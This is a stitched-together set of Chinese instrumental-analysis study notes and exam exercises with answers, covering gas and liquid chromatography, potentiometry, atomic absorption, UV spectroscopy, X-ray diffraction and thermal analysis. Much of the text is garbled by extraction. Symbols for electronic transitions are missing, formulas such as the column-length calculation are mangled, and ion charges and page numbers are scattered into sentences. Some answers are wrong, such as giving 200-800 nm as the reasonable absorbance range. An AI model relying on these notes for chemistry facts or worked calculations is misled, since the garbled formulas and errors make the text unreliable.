6.从色谱流出曲线中可以得到以下信息:a.根据色谱峰的个数,可以推断样品所含的最少组分数;b.根据色谱峰的保留值可以进行定性分析;c.根据色谱峰的面积或峰高可以进行定量分析;d.根据色谱峰的位置和区域宽度可对色谱柱效能进行评价。 7.提高时间,可使色谱峰变窄;A和B峰之间的距离和两物质极性.沸点.热力学性质有关。 8.气相色谱用的载体种类:

9.红色载体:由硅藻土与粘合剂在900摄氏度左右煅烧而成,因其中含有少量的氧化铁,故略带红色。红色载体的机械强度高,表面积大,孔径较小,能涂较多的固定液,色谱分离效率高。但红色载体表面存在吸附中心,同时催化活性也强,故分析极性物质时常有拖尾现象。适合于涂渍非极性固定液,分析非极性和弱极性组分,不宜用于高温分析。

10.白色载体:由硅藻土和少量助熔剂碳酸钠在大于900摄氏度的高温下煅烧而成,其中的氧化铁在助熔剂的作用下生成无色铁硅酸钠,故有红色转变为白色的多孔性颗粒。白色载体和红色载体相比,表面孔较粗,表面积较小,机械强度差,柱效低。但白色载体表面活性中心较少,对极性物质的吸附性小,催化活性也小,故一般用于分析极性物质和在较高温下的分析。 11.气相色谱检测器的分类1.按响应值与时间关系分类a.累积式(积分型)检测器b.差分式(微分型)检测器2.按不同化合物响应大小分类a.通用性检测器b.选择性检测器3.按响应值与浓度或与质量有关分类a.浓度型检测器b.质量型检测器 12.检测器的性能指标:灵敏度、检测限、最小检测量 13.热导池检测器(TCD)结构简单,是一种通用浓度型检测器。 14.氢火焰离子监测器(FID):对于有机化合物,氢焰检测器有很高的灵敏度,故适宜于痕量有机物的分析。属于通用性.质量型的检测器。缺点是对载气要求高.检测时要破坏样品,不能检测永久性气体,如:氢气,氮气等

15.电子捕获检测器:电子捕获检测器是一种有选择性的浓度型检测器。它只对电负性大的物质,如含有卤素.硫.磷氮和氧的物质有响应,且电负性越强,灵敏度越高。其中电压在50伏以内,太大电子不易被捕获。阴.阳级用不锈钢制成。 16.火焰光度检测器:火焰光度检测器是一种对含磷.含硫化合物有高度选择性的质量型检测器。它适用于含磷含硫的农药及含微量磷硫的其他有机物的测定。

17.色谱峰面积的测定方法:1.峰高乘半峰宽法2.峰高乘平均峰宽法3.自动积分仪法4.用峰高代替峰面积定量 18.定量校正因子:绝对校正因子;相对校正因子 19.定量方法:外标法(又叫标准曲线法);内标法(当只需测定样品中某几个组分的含量时,且样品中所有组分不能全部出峰时);归一化法(当样品中各组分都能流出色谱柱,并在色谱图上显示色谱峰时)

20.气相色谱的许多理论与技术同样适用于HPLC,但HPLC与气相色谱相比,有一定的差别:1.使用范围不同2.流动相作用不同3.色谱柱不同4.检测器不同5.样品制备性能不同 21.柱温是影响组分之间分离程度的最大因素。

22.高效液相色谱仪的输液泵应具备以下条件:A、流量要恒定,无动脉并具有较大的调节范围。B.应有足够的输送压力,并能在高压下连续工作。C.能抗溶剂,耐酸,耐碱腐蚀的特点,因为流动相常用有机溶剂,有时还要加缓冲盐,少量酸或碱等成分。D.泵的死体积要小,以便于更换溶剂和进行梯度洗脱。

23.分配比变化范围宽的复杂样品适合梯度洗脱,其他均不可以。

24.什么是梯度洗脱?它与气相色谱的程序升温有何不同? 1)就是在分离过程中使流动相的组成极性PH等按一定程序连续变化,使样品中各组分 能在最佳的分配比K下出峰,使保留时间短,拥挤不堪,甚至重叠的组分和保留时间过长而峰形扁平的组分获得很好的分离,特别适合样品中组分的K值范围很宽的复杂样品分析。2)程序升温是通过程序改变柱温而液相色谱是通过改变流动相组成,极性,PH来达到改变K值的目的。

20.阿贝透镜衍射成像可分为两个过程。

①平行光束受到有周期性特征物体的散射作用形成各级衍射谱,同级平行散射波经过透射后都聚焦在后焦面上同一点。② 各级衍射波通过干涉在像平面上形成反映物的特征的像。在透射电子显微镜中,用电子束代替平行入射光束,用薄膜状的样品代替周期性结构的物体,就可以重复以上衍射成像过程。 21.扫描电镜中,离子溅射镀膜和真空镀膜相比其优点

1)装置简单,使用方便,建设一次只需几分钟,而真空镀膜则需半小时以上

2)消耗贵金属少,每次仅需几毫克

3)对同一种镀膜材料离子建设镀膜质量高,能形成颗粒更细,更致密更均匀,附着力更强的膜。

22.荧光物质往往具有如下特征:1.具有大的共轭双键结构2.具有刚性的平面结构3.取代基团为给电子取代基

23.影响荧光强度的环境因素:1.溶剂的影响2.温度的影响3.PH的影响。4.荧光猝灭作用

24.荧光分析中常用的分析技术:1.直接测定法2.间接测定法3.同步荧光法

25.X射线是一种波长很短的电磁辐射,其波长范围约为0.001~50nm,介于紫外线和伽马射线之间。以0.1nm波长为界,通常将软X射线(波长大于0.1nm,能量较低)和硬X射线(波长小于0.1nm,能量较高)

26.布拉格定律主要应用在以下两个方面: 1)X射线的色散。通过采用具有不同晶格间距的晶体和不同的掠射角可使连续波长X射线产生色散。2)晶体结构的推测。用已知波长的X射线照射晶体,通过测量产生相干散射的掠射角来计算晶格间距,进而推测晶体结构。

27.按仪器结构和样品形式的不同,X射线衍射光谱法可分为多晶粉末法和单晶衍射法

28.w圆的作用是使晶体旋转到能使平面点阵组产生衍射的位置;2θ圆的作用是调节检测器的检测角度,使晶体产生的衍射X射线能进入检测器。

29.热重分析法的仪器是天平。热天平的主要组成部分包括天平,加热炉,程序控温系统和数据记录系统 30.热重法(TG)记录的曲线为热重曲线,曲线的纵坐标为质量,横坐标为温度

31.影响热重分析的主要因素:升温速率,气氛,挥发物再冷凝,坩埚,样品

32.差热扫描量热法(DSC)记录的曲线称为差示扫描量热曲线,纵坐标为样品与参比物的热流率dH/dt(单位时间样品热焓的变化)单位J/s,横坐标时间或温度。

第19篇:中南大学仪器分析经典习题总结

中南大学仪器分析各章节经典习题

第2章 气相色谱分析

一.选择题

1.在气相色谱分析中, 用于定性分析的参数是 (保留值保留值) 2.在气相色谱分析中, 用于定量分析的参数是 ( D ) A 保留时间 B 保留体积 C 半峰宽 D 峰面积

3.使用热导池检测器时, 应选用下列哪种气体作载气, 其效果最好? ( A ) A H2 B He C Ar D N2 4.热导池检测器是一种 (浓度型检测器) 5.使用氢火焰离子化检测器, 选用下列哪种气体作载气最合适? ( D ) A H2 B He C Ar D N2

6、色谱法分离混合物的可能性决定于试样混合物在固定相中( D )的差别。 A.沸点差, B.温度差, C.吸光度, D.分配系数。

7、选择固定液时,一般根据( C )原则。

A.沸点高低, B.熔点高低, C.相似相溶, D.化学稳定性。

8、相对保留值是指某组分2与某组分1的(调整保留值之比 )。

9、气相色谱定量分析时( B )要求进样量特别准确。 A.内标法;B.外标法;C.面积归一法。

10、理论塔板数反映了(柱的效能。

11、下列气相色谱仪的检测器中,属于质量型检测器的是( B ) A.热导池和氢焰离子化检测器; B.火焰光度和氢焰离子化检测器; C.热导池和电子捕获检测器; D.火焰光度和电子捕获检测器。

12、在气-液色谱中,为了改变色谱柱的选择性,主要可进行如下哪种(些)操作?( D ) A.改变固定相的种类 B.改变载气的种类和流速 C.改变色谱柱的柱温 D.(A)、(B)和(C)

13、进行色谱分析时,进样时间过长会导致半峰宽( 变宽 )。

14、在气液色谱中,色谱柱的使用上限温度取决于( D )

A.样品中沸点最高组分的沸点,B.样品中各组分沸点的平均值。C.固定液的沸点。D.固定液的最高使用温度

15、分配系数与下列哪些因素有关( D )

A.与温度有关;B.与柱压有关;C.与气、液相体积有关;D.与组分、固定液的热力学性质有关。

二、填空题

1.在一定温度下, 采用非极性固定液,用气-液色谱分离同系物有机化合物, 低碳数的有机化合物先流出色谱柱, _____高碳数的有机化合物____后流出色谱柱。

2.气相色谱定量分析中对归一化法要求的最主要的条件是试样中所有组分都要在一定时间内分离流出色谱柱,且在检测器中产生信号。

3.气相色谱分析中, 分离非极性物质, 一般选用非极性固定液, 试样中各组分按沸点的高低分离, 沸点低的组分先流出色谱柱,沸点高的组分后流出色谱柱。

4.在一定的测量温度下,采用非极性固定液的气相色谱法分离有机化合物, 低沸点的有机化合物先流出色谱柱, 高沸点的有机化合物后流出色谱柱。

5.气相色谱分析中, 分离极性物质, 一般选用极性固定液, 试样中各组分按 极性的大小分离, 极性小的组分先流出色谱柱, 极性大的组分后流出色谱柱。

6、在气相色谱中,常以理论塔板数(n)和理论塔板高度(H)来评价色谱柱效能,有时也用 单位柱长(m) 、有效塔板理论数(n有效)表示柱效能。

7、在线速度较低时,分子扩散项是引起色谱峰扩展的主要因素,此时宜采用相对分子量大的气体作载气,以提高柱效。

8、在一定的温度和压力下,组分在固定相和流动相之间的分配达到的平衡,随柱温柱压变化,而与固定相及流动相体积无关的是分配系数。如果既随柱温、柱压变化、又随固定相和流动相的体积而变化,则是容量因子。

9、描述色谱柱效能的指标是理论塔板数,柱的总分离效能指标是分离度。

10、气相色谱的浓度型检测器有 TCD , ECD ;质量型检测器有 FID , FPD ;其中TCD使用氢气或者氦气气体时灵敏度较高;FID对大多有机物的测定灵敏度较高;ECD只对有电负性的物质有响应。 三.判断题

1.组分的分配系数越大,表示其保留时间越长。 ( √ )

2.速率理论给出了影响柱效的因素及提高柱效的途径。 ( √ ) 5.在色谱分离过程中,单位柱长内,组分在两相向的分配次数越多,分离效果越好。( √ )

6.根据速率理论,毛细管色谱高柱效的原因之一是由于涡流扩散项A = 0。 ( √ )

7.采用色谱归一化法定量的前提条件是试样中所有组分全部出峰。 ( √ )

8.色谱外标法的准确性较高,但前提是仪器稳定性高和操作重复性好。 ( √ )

9.毛细管气相色谱分离复杂试样时,通常采用程序升温的方法来改善分离效果。( √ )

10.毛细管色谱的色谱柱前需要采取分流装置是由于毛细管色谱柱对试样负载量很小;柱后采用“尾吹”装置是由于柱后流出物的流速太慢。 ( √ )

第3章 高效液相色谱分析

一、选择题

1.液相色谱适宜的分析对象是( B )。

A 低沸点小分子有机化合物 B 高沸点大分子有机化合物 C 所有有机化合物 D 所有化合物 2.在液相色谱中,梯度洗脱适用于分离( D )。

A 异构体 B 沸点相近,官能团相同的化合物 C 沸点相差大的试样 D 极性变化范围宽的试样 3吸附作用在下面哪种色谱方法中起主要作用( B )。

A 液一液色谱法 B 液一固色谱法 C 键合相色谱法 D 离子交换法 4.在液相色谱中,提高色谱柱柱效的最有效途径是( A )。

A 减小填料粒度 B 适当升高柱温 C 降低流动相的流速 D 增大流动相的流速 5.液相色谱中通用型检测器是( B )。

A 紫外吸收检测器 B 示差折光检测器 C 热导池检测器 D 荧光检测器 6.高压、高效、高速是现代液相色谱的特点,采用高压主要是由于( C )。 A 可加快流速,缩短分析时间 B 高压可使分离效率显著提高

C 采用了细粒度固定相所致 D 采用了填充毛细管柱 7.在液相色谱中,下列检测器可在获得色谱流出曲线的基础上,同时获得被分离组分的三维彩色图形的是( A )。 A 光电二极管阵列检测器 B 示差折光检测器 C 荧光检测器 D 电化学检测器 8.液相色谱中不影响色谱峰扩展的因素是( B )。

A 涡流扩散项 B 分子扩散项 C 传质扩散项 D 柱压效应 9.在液相色谱中,常用作固定相又可用作键合相基体的物质是( B )。 A 分子筛 B 硅胶 C 氧化铝 D 活性炭

10.样品中各组分的出柱顺序与流动相的性质无关的色谱是( D )。 A 离子交换色谱 B 环糊精色谱 C 亲和色谱 D 凝胶色谱 11.在液相色谱中,固体吸附剂适用于分离( A )。

A 异构体 B 沸点相近,官能团相同的颗粒 C 沸点相差大的试样 D 极性变换范围 12水在下述色谱中,洗脱能力最弱(作为底剂)的是( B )。

A 正相色谱法 B 反相色谱法C 吸附色谱法 D 空间排斥色谱法 13.在下列方法中,组分的纵向扩散可忽略不计的是( B )。

A 毛细管气相色谱法 B 高效液相色谱法 C 气相色谱法 D 超临界色谱法 14.下列用于高效液相色谱的检测器,( D )检测器不能使用梯度洗脱。

A、紫外检测器 B、荧光检测器 C、蒸发光散射检测器 D、示差折光检测器 15.高效液相色谱仪与气相色谱仪比较增加了( D )

2 A、恒温箱 B、进样装置 C、程序升温 D、梯度淋洗装置

三、填空题

1.高效液相色谱中的极度洗脱技术类似于气相色谱中的程序升温,不过前者连续改变的是流动相的组成与极性,而不是温度。

2.在液-液分配色谱中,对于亲水固定液采用疏水性流动相,即流动相的极性 小于固定相的极性称为正相分配色谱。

3.正相分配色谱适用于分离 极性 化合物、极性 小 的先流出、极性 大 的后流出。

4.高压输液泵是高效液相色谱仪的关键部件之一,按其工作原理分为 恒流泵 和 恒压泵两大类。

5.离子对色谱法是把离子对试剂加人流动相中,被分析样品离子与 离子对试剂生成中性离子对,从而增加了样品离子在非极性固定相中的溶解度,使 分配系数增加,从而改善分离效果。 6.高效液相色谱的发展趋势是减小 填料粒度和柱径以提高柱效。

7.通过化学反应,将 固定液键合到载体表面,此固定相称为化学键合固定相。

8.在液相色谱中,吸附色谱特别适合于分离异构体,梯度洗脱方式适用于分离极性变化范围宽的试样。 9.用凝胶为固定相,利用凝胶的孔径与被分离组分分子尺寸 间的相对大小关系,而分离、分析的色谱法,称为空间排阻(凝胶)色谱法。凝胶色谱的选择性只能通过选择合适的 固定相 来实现。 10.在正相色谱中,极性的小组分先出峰,极性的大组分后出峰。

三、判断题

1.利用离子交换剂作固定相的色谱法称为离子交换色谱法。 ( √ ) 2.高效液相色谱适用于大分子,热不稳定及生物试样的分析。 ( √ ) 3.离子色谱中,在分析柱和检测器之间增加了一个“抑制柱”,以增加洗脱液本底电导。 ( × )

4.反相分配色谱适于非极性化合物的分离。 ( √ ) 5.高效液相色谱法采用梯度洗脱,是为了改变被测组分的保留值,提高分离度。( √ ) 6.示差折光检测器是属于通用型检测器,适于梯度淋洗色谱。 ( × ) 7.化学键合固定相具有良好的热稳定性,不易吸水,不易流失,可用梯度洗脱。( √ ) 8.液相色谱的流动相又称为淋洗液,改变淋洗液的组成、极性可显著改变组分分离效果。( √ ) 9.高效液相色谱柱柱效高,凡是能用液相色谱分析的样品不用气相色谱法分析。( × ) 10.正相键合色谱的固定相为非(弱)极性固定相,反相色谱的固定相为极性固定相。 ( × )

第4章 电位分析法

一、选择题

1.下列参量中,不属于电分析化学方法所测量的是 ( C ) A 电动势

B 电流 C 电容 D 电量 2.列方法中不属于电化学分析方法的是 ( D ) A 电位分析法 B 伏安法 C 库仑分析法 D 电子能谱 3.分电解池阴极和阳极的根据是 ( A ) A 电极电位 B 电极材料 C 电极反应 D 离子浓度 4.H玻璃电极膜电位的产生是由于 ( A ) A 离子透过玻璃膜 B 电子的得失

C 离子得到电子 D 溶液中H+和硅胶层中的H+发生交换 5.璃电极IUPAC分类法中应属于 ( B ) A 单晶膜电极 B 非晶体膜电极 C 多晶膜电极 D 硬质电极 6.测定溶液pH时,所用的参比电极是: ( A ) A 饱和甘汞电极 B 银-氯化银电极 C 玻璃电极 D 铂电极

7.璃电极在使用前,需在去离子水中浸泡24小时以上,其目的是: ( D ) A 清除不对称电位 B清除液接电位C 清洗电极D使不对称电位处于稳定 8.体膜离子选择电极的灵敏度取决于 ( B ) A 响应离子在溶液中的迁移速度 B 膜物质在水中的溶解度 C 行营离子的活度系数 D 晶体膜的厚度

9.氟离子选择电极测定溶液中F-离子的含量时,主要的干扰离子是 ( C )

3 A ClB BrC OHD NO3

10.实验测定溶液pH值时,都是用标准缓冲溶液来校正电极,其目的是消除何种的影响。 ( D ) A 不对称电位 B 液接电位 C 温度 D不对称电位和液接电位 11.pH玻璃电极产生的不对称电位来源于 ( A )

+A内外玻璃膜表面特性不同 B 内外溶液中H 浓度不同

+C 内外溶液的 H 活度系数不同 D 内外参比电极不一样

12.用离子选择电极标准加入法进行定量分析时,对加入标准溶液的要求为 (体积要小,其浓度要高) 13.离子选择电极的电位选择性系数可用于 ( B ) A估计电极的检测限 B 估计共存离子的干扰程度 C 校正方法误差 D 计算电极的响应斜率

14.在电位滴定中,以 E/V-V(E为电位,V 为滴定剂体积)作图绘制滴定曲线, 滴定终点为: ( C ) A曲线的最大斜率(最正值)点 B 曲线的最小斜率(最负值)点 C 曲线的斜率为零时的点 D E /V 为零时的点

二、填空题

1.正负离子都可以由扩散通过界面的电位称为_扩散电位, 它没有_强制性和选择_性, 而渗透膜, 只能让某种离子通过, 造成相界面上电荷分布不均, 产生双电层,形成_膜__电位。

-2.用氟离子选择电极的标准曲线法测定试液中F浓度时, 对较复杂的试液需要加入_TISAB试剂, 其目的有第一维

+-持试样与标准试液有恒定的离子活度;第二使试液在离子选择电极适合的pH范围内,避免H或OH干扰;第三使被测离子释放成为可检测的游离离子。

3.用直读法测定试液的pH值, 其操作定义可用式来表示。用pH玻璃电极测定酸度时, 测定强酸溶液时, 测得的pH比实际数值_偏高, 这种现象称为酸差。测定强碱时, 测得的pH值比实际数值_偏低__, 这种现象称为碱差。

- 3+ 4.由LaF3单晶片制成的氟离子选择电极, 晶体中 _F是电荷的传递者, La是固定在膜相中不参与电荷的传递, 内参比电极是Ag|AgCl_, 内参比电极由_0.1mol/LNaCl和0.1mol/LNaF溶液组成。

5.在电化学分析方法中, 由于测量电池的参数不同而分成各种方法:测量电动势为_电位分析法_;测量电流随电压变化的是_伏安法,其中若使用__滴汞电极的则称为_极谱法; 测量电阻的方法称为电导分析法;测量电量的方法称为_库伦分析法。

6.电位法测量常以_待测试液作为电池的电解质溶液, 浸入两个电极, 一个是指示电极, 另一个是参比电极, 在零电流条件下, 测量所组成的原电池电动势。

7.离子选择电极的选择性系数表明A离子选择电极抗B离子干扰的能力。系数越小表明抗干扰的能力越强。 8.离子选择电极用标准加入法进行定量分析时, 对加入的标准溶液要求体积要小,浓度要高,目的是减小稀释效应。

三、判断题

4.改变玻璃电极膜的组成可制成对其他阳离子响应的玻璃电极。 ( √ ) 5.Kij称为电极的选择性系数,通常Kij

6.离子选择性电极的选择性系数在严格意义上来说不是一个常数,仅能用来评价电极的选择性并估算干扰离子产生的误差大小。 ( √ )

7.待测离子的电荷数越大,测定灵敏度也越低,产生的误差越大,故电位法多用于低价离子测定。 (√ )

10.标准加人法中,所加人的标准溶液的体积要小,浓度相对要大。 ( √ )-第8章 原子吸收光谱分析

1.空心阴极灯的主要操作参数是 ( 灯电流 ) 2.在原子吸收测量中,遇到了光源发射线强度很高,测量噪音很小,但吸收值很低,难以读数的情况下,采取了下列一些措施,指出下列哪种措施对改善该种情况是不适当的 ( A ) A 改变灯电流 B 调节燃烧器高度 C 扩展读数标尺 D 增加狭缝宽度

3.原子吸收分析对光源进行调制, 主要是为了消除 ( B ) A 光源透射光的干扰B 原子化器火焰的干扰C 背景干扰 D 物理干扰 4.影响原子吸收线宽度的最主要因素是 ( D ) A 自然宽度 B 赫鲁兹马克变宽 C 斯塔克变宽 D 多普勒变宽 5.原子吸收法测定钙时, 加入EDTA是为了消除下述哪种物质的干扰? ( B )

4 A 盐酸 B 磷酸 C 钠 D 镁

6.空心阴极灯中对发射线半宽度影响最大的因素是 ( D ) A 阴极材料 B 阳极材料 C 内充气体 D 灯电流

7.在原子吸收分析中,如怀疑存在化学干扰,例如采取下列一些补救措施,指出哪种措施不适当 ( D ) A 加入释放剂B 加入保护剂C 提高火焰温度D 改变光谱通带

8.在原子吸收法中, 能够导致谱线峰值产生位移和轮廓不对称的变宽应是 ( B ) A 热变宽 B 压力变宽

C 自吸变宽 D 场致变宽

9.在原子吸收光谱分析中,若组分较复杂且被测组分含量较低时,为了简便准确地进行分析,最好选择何种方法进行分析? ( C ) A 工作曲线法 B 内标法 C 标准加入法 D 间接测定法 10.石墨炉原子化的升温程序如下: ( 干燥、灰化、原子化和净化 ) 11.原子吸收光谱法测定试样中的钾元素含量,通常需加入适量的钠盐, 这里钠盐被称为 ( C ) A 释放剂 B 缓冲剂 C 消电离剂 D 保护剂

12.空心阴极灯内充的气体是 ( 少量的氖或氩等惰性气体 ) 13.在火焰原子吸收光谱法中, 测定下述哪种元素需采用乙炔--氧化亚氮火焰 ( B ) A 钠 B 钽 C 钾 D 镁

14.在原子吸收光谱法分析中, 能使吸光度值增加而产生正误差的干扰因素是 ( D ) A 物理干扰 B 化学干扰 C 电离干扰 D 背景干扰 15.原子吸收分光光度计中常用的检测器是 ( 光电倍增管)

二、填空题

1.在原子吸收光谱中,为了测出待测元素的峰值吸收必须使用锐线光源,常用的是空心阴极灯,符合上述要求。 2.空心阴极灯的阳极一般是钨棒, 而阴极材料则是待测元素,管内通常充有低压惰性气体。

3.在通常得原子吸收条件下,吸收线轮廓主要受多普勒(热变宽)和劳伦茨(压力或碰撞)变宽得影响。 4.在原子吸收分光光度计中,为定量描述谱线的轮廓习惯上引入了两个物理量,即谱线半宽度和中心频率。 5.原子化器的作用是将试样蒸发并使待测元素转化为基态原子蒸气,原子化的方法有火焰原子化法和非火焰原子化法。

6.在原子吸收法中,由于吸收线半宽度很窄,因此测量积分吸收有困难,所以采用测量峰值吸收来代替。

7.火焰原子吸收法与分光光度法,其共同点都是利用吸收原理进行分析的方法,但二者有本质区别,前者是原子吸收,后者是分子吸收,所用的光源,前者是锐线光源,后者是连续光源。

8.在原子吸收法中, 提高空心阴极灯的灯电流可增加发光强度,但若灯电流过大, 则自吸随之增大, 同时会使发射线变宽。

3-3+3+9.原子吸收法测定钙时,为了抑制 PO4的干扰,常加入的释放剂为La;测定镁时,为了抑制 Al的干扰,常加2+3+入的释放剂为Sr;测定钙和镁时,为了抑制Al的干扰,常加入保护剂EDTA。

10.原子吸收分光光度计的氘灯背景校正器,可以扣除背景的影响,提高分析测定的灵敏度,其原因是 氘灯的连续辐射可被产生背景的分子吸收,基态原子也吸收连续辐射,但其吸收度可忽略。

三、判断题

2.实现峰值吸收的条件之一是:发射线的中心频率与吸收线的中心频率一致。 (√ ) 6.空心阴极灯能够发射待测元素特征谱线的原因是由于其阴极元素与待测元素相同。( √ )

8.根据玻耳兹曼分布定律进行计算的结果表明,原子化过程时,所有激发能级上的原子数之和相对于基态原子总数来说很少。 ( √ )

9.石墨炉原子化法比火焰原子化法的原子化程度高,所以试样用量少。 ( √ )

10.贫燃火焰也称氧化焰,即助燃气过量。过量助燃气带走火焰中的热量,使火焰温度降低,适用于易电离的碱金属元素的测定。 ( √ )

第9章 紫外吸收光谱分析

一、选择题

1.在紫外-可见光度分析中极性溶剂会使被测物吸收峰 ( C ) A 消失 B 精细结构更明显 C 位移 D 分裂

2.紫外光度分析中所用的比色杯是用( 石英 )材料制成的。

3.下列化合物中,同时有,,跃迁的化合物是 ( B) A 一氯甲烷 B 丙酮 C 1,3-丁烯 D 甲醇

4.许多化合物的吸收曲线表明,它们的最大吸收常常位于 200─400nm 之间,对这一光谱区应选用的光源为 ( A ) A 氘灯或氢灯 B 能斯特灯

5 C 钨灯 D 空心阴极灯灯

5.助色团对谱带的影响是使谱带 ( 波长变长 ) 6.对化合物 CH3COCH=C(CH3)2的跃迁,当在下列溶剂中测定,谱带波长最短的是 ( D ) A 环己烷 B 氯仿 C 甲醇 D 水

7.指出下列哪种不是紫外-可见分光光度计使用的检测器? ( 热电偶 ) 8.紫外-可见吸收光谱主要决定于 ( 分子的电子结构 )

二、填空题

1.在分光光度计中,常因波长范围不同而选用不同材料的容器,现有下面三种材料的容器,各适用的光区为:(1) 石英比色皿用于紫外区 (2) 玻璃比色皿用于可见区

2.在分光光度计中,常因波长范围不同而选用不同的光源,下面三种光源,各适用的光区为:(1) 钨灯用于可见区 氢灯用于紫外区

3.紫外-可见分光光度测定的合理吸光范围应为200-800nm。这是因为在该区间浓度测量的相对误差较小 4.紫外-可见光分光光度计所用的光源是氕灯和钨灯两种.5.在紫外-可见吸收光谱中, 一般电子能级跃迁类型为:

**(1)─>跃迁, 对应真空紫外光谱区 (2) n─>跃迁, 对应远紫外光谱区

**(3)─>跃迁, 对应紫外光谱区 (4) n─>跃迁, 对应近紫外光谱区 6.共轭二烯烃在己烷溶剂中 =219nm,改用乙醇作溶剂时λ

max

比219nm 大, 原因是该吸收是由─>跃迁引

*起,在乙醇中,该跃迁类型的激发态比基态的稳定性大。

第2章气相色谱分析

1.简要说明气相色谱分析的基本原理

答:借在两相间分配原理而使混合物中各组分分离。

气相色谱就是根据组分与固定相与流动相的亲和力不同而实现分离。组分在固定相与流动相之间不断进行溶解、挥发(气液色谱),或吸附、解吸过程而相互分离,然后进入检测器进行检测。 2.气相色谱仪的基本设备包括哪几部分?各有什么作用? 答:气路系统、进样系统、分离系统、温控系统以及检测和记录系统.

气相色谱仪具有一个让载气连续运行的管路密闭的气路系统.

进样系统包括进样装置和气化室.其作用是将液体或固体试样,在进入色谱柱前瞬间气化,然后快速定量地转入到色谱柱中.

8.为什么可用分离度R作为色谱柱的总分离效能指标? 答:分离度同时体现了选择性与柱效能,即热力学因素和动力学因素,将实现分离的可能性和现实性结合起来。 9.能否根据理论塔板数来判断分离的可能性?为什么? 答:不能,有效塔板数仅表示柱效能的高低,柱分离能力发挥程度的标志,而分离的可能性取决于组分在固定相和流动相之间分配系数的差异。

21.

解:(1)从图中可以看出,tR2=17min, Y2=1min, 22n = 16(tR2/Y2) =16×(17/1) = 4624 (2) t’R1= tR1- tM =14-1=13min t”R2=tR2 – tM = 17-1 = 16min

6 (3)相对保留值 α= t’R2/t’R1=16/13=1.231 通常对于填充柱,有效塔板高度约为0.1cm, 2L=16R[[α/(α-1)]2﹒H有效

22=16×1.5×[(1.231/(1.231-1)]×0.1 =102.2cm ≃1m 22.分析某种试样时,两个组分的相对保留值r21=1.11, 柱的有效塔板高度H=1mm,需要多长的色谱柱才能完全分离?

2解: L=16R[[α/(α-1)]2﹒H有效

22=16×1.5×[(1.11/(1.11-1)]×0.1 =366.6cm ≃4m 第3章 高效液相色谱分析

3.在液相色谱中, 提高柱效的途径有哪些?其中最有效的途径是什么? 答:液相色谱中提高柱效的途径主要有:

(1)提高柱内填料装填的均匀性; (2)改进固定相:

(3)粒度; 选择薄壳形担体; 选用低粘度的流动相; (4)适当提高柱温

其中,减小粒度是最有效的途径。.5.何谓正相色谱及反相色谱?在应用上有什么特点?

答:在色谱法中,流动相的极性小于固定液的极性,称为正相色谱;在色谱法中,流动相的极性大于固定液的极性,称为反相色谱。在应用上,正相色谱主要用于分离极性物质;反相色谱主要用于分离弱极性或非极性物质。 6.何谓化学键合固定相?它有什么突出的优点?

答:利用化学反应将固定液的官能团键合在载体表面形成的固定相称为化学键合固定相。

优点:固定相表面没有液坑,比一般液体固定相传质快的多;无固定相流失,增加了色谱柱的稳定性及寿命;可以键合不同的官能团,能灵活地改变选择性,可应用与多种色谱类型及样品的分析;有利于梯度洗提,也有利于配用灵敏的检测器和馏分的收集。

8.何谓梯度洗提?它与气相色谱中的程序升温有何异同之处?

答:在一个分析周期内,按一定程序不断改变流动相的组成或浓度配比,称为梯度洗提,是改进液相色谱分离的重要手段。

梯度洗提与气相色谱中的程序升温类似,但是前者连续改变的是流动相的极性、pH或离子强度,而后者改变的温度。

程序升温也是改进气相色谱分离的重要手段。

9.高效液相色谱进样技术与气相色谱进样技术有和不同之处?

答:在液相色谱中为了承受高压,常常采用停流进样与高压定量进样阀进样的方式.

第4章 电位分析法

2.何谓指示电极及参比电极?试各举例说明其作用

答:指示电极:用来指示溶液中离子活度变化的电极,其电极电位值随溶液中离子活度的变化而变化,在一定的测量条件下,当溶液中离子活度一定时,指示电极的电极电位为常数。例如测定溶液pH时,可以使用玻璃电极作为指示电极,玻璃电极的膜电位与溶液pH成线性关系,可以指示溶液酸度的变化。

参比电极:在进行电位测定时,是通过测定原电池电动势来进行的,电动势的变化要体现指示电极电位的变化,因此需要采用一个电极电位恒定,不随溶液中待测离子活度或浓度变化而变化的电极作为基准,这样的电极就称为参比电极。例如,测定溶液pH时,通常用饱和甘汞电极作为参比电极。 4.为什么离子选择性电极对欲测离子具有选择性?如何估量这种选择性?

答:离子选择性电极是以电位法测量溶液中某些特定离子活度的指示电极。各种离子选择性电极一般均由敏感膜及其支持体,内参比溶液,内参比电极组成,其电极电位产生的机制都是基于内部溶液与外部溶液活度不同而产生电位差。其核心部分为敏感膜,它主要对欲测离子有响应,而对其它离子则无响应或响应很小,因此每一种离子选择性电极都具有一定的选择性。

可用离子选择性电极的选择性系数来估量其选择性。 6.为什么一般来说,电位滴定法的误差比电位测定法小?

7 答:直接电位法是通过测量零电流条件下原电池的电动势,根据能斯特方程式来确定待测物质含量的分析方法。而电位滴定法是以测量电位的变化为基础的,因此,在电位滴定法中溶液组成的变化、温度的微小波动、电位测量的准确度等对测量影响较小。

第8章 原子吸收光谱分析

2.何谓锐线光源?在原子吸收光谱分析中为什么要用锐线光源?

答:锐线光源是发射线半宽度远小于吸收线半宽度的光源,如空心阴极灯。在使用锐线光源时,光源发射线半宽度很小,并且发射线与吸收线的中心频率一致。这时发射线的轮廓可看作一个很窄的矩形,即峰值吸收系数K 在此轮廓内不随频率而改变,吸收只限于发射线轮廓内。这样,求出一定的峰值吸收系数即可测出一定的原子浓度。 5.原子吸收分析中,若采用火焰原子化法,是否火焰温度愈高,测定灵敏度就愈高?为什么?

答:不是.因为随着火焰温度升高,激发态原子增加,电离度增大,基态原子减少.所以如果太高,反而可能会导致测定灵敏度降低.尤其是对于易挥发和电离电位较低的元素,应使用低温火焰.8.背景吸收和基体效应都与试样的基体有关,试分析它们的不同之处.

答:基体效应是指试样在转移、蒸发过程中任何物理因素的变化对测定的干扰效应。背景吸收主要指基体元素和盐分的粒子对光的吸收或散射,而基体效应则主要是由于这些成分在火焰中蒸发或离解时需要消耗大量的热量而影响原子化效率,以及试液的黏度、表面张力、雾化效率等因素的影响。

第9章 紫外吸收光谱分析

3.何谓助色团及生色团?试举例说明.

解:能够使化合物分子的吸收峰波长向长波长方向移动的杂原子基团称为助色团,例如CH4的吸收峰波长位于远紫外区,小于150nm但是当分子中引入-OH后,甲醇的正己烷溶液吸收波长位移至177nm,-OH起到助色团的作用.

